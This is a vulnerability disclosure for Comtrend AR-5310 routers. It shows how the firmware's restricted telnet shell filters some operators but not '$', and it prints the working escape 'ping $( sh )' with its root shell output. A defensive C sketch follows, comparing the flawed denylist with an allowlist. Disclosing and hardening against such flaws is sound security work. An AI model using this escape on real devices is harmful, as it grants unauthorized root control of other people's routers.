# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape
# Date: 2019-07-20
# Exploit Author: AMRI Amine
# Vendor Homepage: https://www.comtrend.com/
# Version: GE31-412SSG-C01_R10.A2pG039u.d24k
# Tested on: Linux (busybox)
TL;DR: A local user can bypass the restricted shell using the command substitution operator $( command ).
Comtrend AR 5310 routers have a restricted shell; the list of commands a user can execute is:
[ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ]
Usual terminal constructs like:
the command separator ";"
the control operator "&" (run in foreground)
the redirection operator (pipe) "|"
the command substitution operator "`"
are all filtered, as shown here:
> ;
Warning: operator ; is not supported!
telnetd:error:476.449:processInput:490:unrecognized command
> |
Warning: operator | is not supported!
telnetd:error:484.871:processInput:490:unrecognized command
> &
Warning: operator & is not supported!
telnetd:error:487.421:processInput:490:unrecognized command
> `
Warning: operator ` is not supported!
telnetd:error:495.334:processInput:490:unrecognized command
Still, the $ operator is not filtered:
> $
telnetd:error:497.862:processInput:490:unrecognized command $
Here I came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell:
> ping $( sh )
exec >&2
ps x | grep telnet
18333 root 4164 S telnetd -m 0
18334 root 4168 S telnetd -m 0
EOF
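The transcript above shows a filter that rejects four operators and misses "$". As an added example (not code from the advisory or from the vendor firmware), the C sketch below contrasts a denylist modelled on that observed behaviour with an allowlist check that a restricted shell could use before handing arguments to execvp() without any shell. The function names and the short ALLOWED subset are assumptions made for illustration.

```c
#include <string.h>

/* Constructed subset of the command list quoted in the advisory. */
static const char *const ALLOWED[] = { "ping", "arp", "uptime", "version", NULL };

/* Model of the behaviour seen in the transcript (an assumption about the
 * firmware's logic): only ; | & and ` are rejected. */
int denylist_accepts(const char *line) {
    return strpbrk(line, ";|&`") == NULL;
}

/* Allowlist check: every byte must belong to a small safe set and the first
 * word must be a known command. '$', '(', ')', quotes, redirections,
 * backslashes and newlines fail simply because they are not listed. */
int allowlist_accepts(const char *line) {
    static const char SAFE[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .:-_";
    size_t len = strlen(line);
    if (len == 0 || len > 128 || strspn(line, SAFE) != len)
        return 0;
    size_t cmd_len = strcspn(line, " ");
    for (int i = 0; ALLOWED[i] != NULL; i++)
        if (strlen(ALLOWED[i]) == cmd_len &&
            strncmp(line, ALLOWED[i], cmd_len) == 0)
            return 1;
    return 0;
}

/* Split an accepted line in place into argv[] suitable for execvp(), so the
 * arguments are never re-parsed by a shell. Returns argc. */
int split_argv(char *line, char *argv[], int max) {
    int argc = 0;
    for (char *tok = strtok(line, " "); tok != NULL && argc < max - 1;
         tok = strtok(NULL, " "))
        argv[argc++] = tok;
    argv[argc] = NULL;
    return argc;
}
```

This block only covers shell metacharacters; per-command argument checks, such as rejecting arguments that begin with "-", would still be needed.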